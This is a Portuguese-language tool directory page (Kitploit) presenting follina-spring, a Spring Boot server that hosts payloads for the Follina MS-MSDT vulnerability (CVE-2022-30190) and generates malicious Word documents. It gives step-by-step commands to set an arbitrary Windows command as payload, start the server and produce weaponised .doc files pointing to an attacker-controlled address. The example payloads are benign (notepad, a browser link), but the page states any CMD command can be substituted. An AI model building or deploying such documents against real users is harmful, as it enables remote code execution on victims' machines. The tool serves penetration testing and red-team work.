Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
follina-spring — Servidor para hospedar/ativar payloads do Follina e gerador de documentos maliciosos do Word que exploram o protocolo MS-MSDT. (CVE-2022-30190) | Kitploit
Ferramentas/GitHubGitHub/dsibilio/follina-spring
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Servidor para hospedar/ativar payloads do Follina e gerador de documentos maliciosos do Word que exploram o protocolo MS-MSDT. (CVE-2022-30190)

Ver Repositório
4há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploração do Follina MS-MSDT com Spring Boot

Este repositório contém uma aplicação Spring Boot simples que atua tanto como servidor para hospedar/ativar payloads Follina, quanto como gerador de documentos Word maliciosos que estão prontos para serem usados como vetores de ataque para explorar CVE-2022-30190.

Esta vulnerabilidade consiste em Execução Remota de Código através do MSDT (Microsoft Windows Support Diagnostic Tool).

Payload do Lado do Servidor

Para servir um payload único de sua escolha, você deve:

  • defina o payload, por exemplo:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • execute o servidor para hospedar o payload estático:
root@kitploit:~
mvn spring-boot:run
  • gere o documento Word "Follina":
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Se você quiser alterar o payload atual, primeiro terá que desativar o servidor ativo atualmente, e repetir os passos após definir o novo payload.

NOTA: o payload pode ser substituído por qualquer outro comando, desde que possa ser executado via CMD do Windows.

Payload do Lado do Cliente

Para servir um payload do lado do cliente de sua escolha, você deve:

  • execute o servidor para ativar os payloads em tempo de execução:
root@kitploit:~
mvn spring-boot:run
  • gere o documento Word "Follina" especificando o parâmetro de consulta cmd, por exemplo:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

O payload neste caso está incorporado no documento, e simplesmente precisará de ativação ao contatar o servidor. Desta forma, você pode ter múltiplos payloads diferentes espalhados por diferentes documentos e não precisará reiniciar o servidor para acionar mudanças de payload - já que pode simplesmente gerar um novo documento com o payload desejado incorporado.

Agradecimentos

Muitos agradecimentos a John Hammond por ter criado a implementação em Python e compartilhado sua análise da CVE.

Baixar ferramenta